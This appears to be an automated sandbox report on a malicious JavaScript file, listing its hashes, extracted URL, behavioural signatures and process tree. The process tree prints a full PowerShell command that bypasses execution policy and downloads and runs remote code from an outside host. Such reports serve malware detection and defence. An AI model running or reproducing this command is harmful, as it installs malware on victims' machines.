Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:34
Static task
static1
Behavioral task
behavioral1
Sample
9af1e1611a6b0e8fc4fb5c63e36baceb315a6eb38450d2ae8525e21f468043d0.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
9af1e1611a6b0e8fc4fb5c63e36baceb315a6eb38450d2ae8525e21f468043d0.js
Resource
win10v2004-20240226-en
General
-
Target
9af1e1611a6b0e8fc4fb5c63e36baceb315a6eb38450d2ae8525e21f468043d0.js
-
Size
69KB
-
MD5
ad3ac6fce54e6401660fac2b1389e482
-
SHA1
b1be7f458113971808e7e71f0074d1304d9d0af1
-
SHA256
9af1e1611a6b0e8fc4fb5c63e36baceb315a6eb38450d2ae8525e21f468043d0
-
SHA512
963c9926720f9c0c0c7284ccd65a56217263df8c92aa4a90a21fddd2cbc9802fc24216469dc55e2ad329e442fc52fcfbad0991f424c092eefeea79e9d971badd
-
SSDEEP
1536:P7K8Pc0reSVDFMi/gra8I7dootq56npg3qOWgcRXCqZ/lo8o+0:P7OPquwFmotqepaqOWgcRXCqlZX0
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2692 powershell.exe 4 2692 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2692 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1704 wrote to memory of 2692 1704 wscript.exe 28 PID 1704 wrote to memory of 2692 1704 wscript.exe 28 PID 1704 wrote to memory of 2692 1704 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\9af1e1611a6b0e8fc4fb5c63e36baceb315a6eb38450d2ae8525e21f468043d0.js1⤵
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-